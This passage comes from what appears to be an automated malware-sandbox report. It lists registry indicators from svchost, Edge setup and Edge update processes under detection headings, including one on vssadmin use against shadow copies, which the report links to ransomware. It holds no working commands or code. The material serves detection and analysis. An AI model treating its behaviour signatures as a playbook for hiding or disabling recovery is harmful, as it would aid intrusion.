  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | svchost.exe
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | svchost.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | svchost.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
- Interacts with shadow copies (2 TTPs, 6 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
  pid | process
  5432 | vssadmin.exe
  5440 | vssadmin.exe
  5472 | vssadmin.exe
  6072 | vssadmin.exe
  6084 | vssadmin.exe
  5072 | vssadmin.exe
-
  Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\101.0.1210.53\\BHO" | setup.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | setup.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | setup.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | setup.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | setup.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | setup.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | setup.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | setup.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | setup.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | setup.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | setup.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | setup.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | setup.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | setup.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | setup.exe
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | setup.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\101.0.1210.53\\BHO" | setup.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | setup.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | setup.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
-
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe, setup.exe, MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdateComRegisterShell64.exe, MicrosoftEdgeUpdate.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}\Elevation | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\ProgID\ = "MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\ = "Microsoft Edge Update Update3Web" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\microsoft-edge\shell\open | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ = "IGoogleUpdate3" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ProxyStubClsid32\ = "{5F64EF81-5A6B-4203-9374-16218714CDFF}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32\ = "{5F64EF81-5A6B-4203-9374-16218714CDFF}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF} | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5F6A18BB-6231-424B-8242-19E5BB94F8ED} | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83} | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LOCALSERVER32 | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.157.61\\msedgeupdate.dll,-1004" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC} | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgeHTM\shell\open | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.161.35\\msedgeupdate.dll,-3000" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\ = "Microsoft Edge Update Legacy On Demand" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\Software\Classes\MSEdgePDF\shell\runas | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\VersionIndependentProgID | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A} | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ = "IGoogleUpdate3WebSecurity" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E816B022-B276-4CA0-B42A-E3EF8927EFD2} | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC} | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\ProgID | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods\ = "10" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\CLSID\ = "{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F09CD6C-5964-4573-82E3-EBFF7702865B}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.CoreClass" | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ = "IAppCommand2" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\NumMethods\ = "11" | MicrosoftEdgeUpdateComRegisterShell64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3COMClassService.1.0\CLSID\ = "{CECDDD22-2E72-4832-9606-A9B0E5E344B2}" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ProxyStubClsid32 | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ProxyStubClsid32\ = "{E816B022-B276-4CA0-B42A-E3EF8927EFD2}" | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{177CAE89-4AD6-42F4-A458-00EC3389E3FE}\ = "ICurrentState" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\NumMethods | MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\ = "Microsoft Edge Update Legacy On Demand" | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4} | MicrosoftEdgeUpdateComRegisterShell64.exe
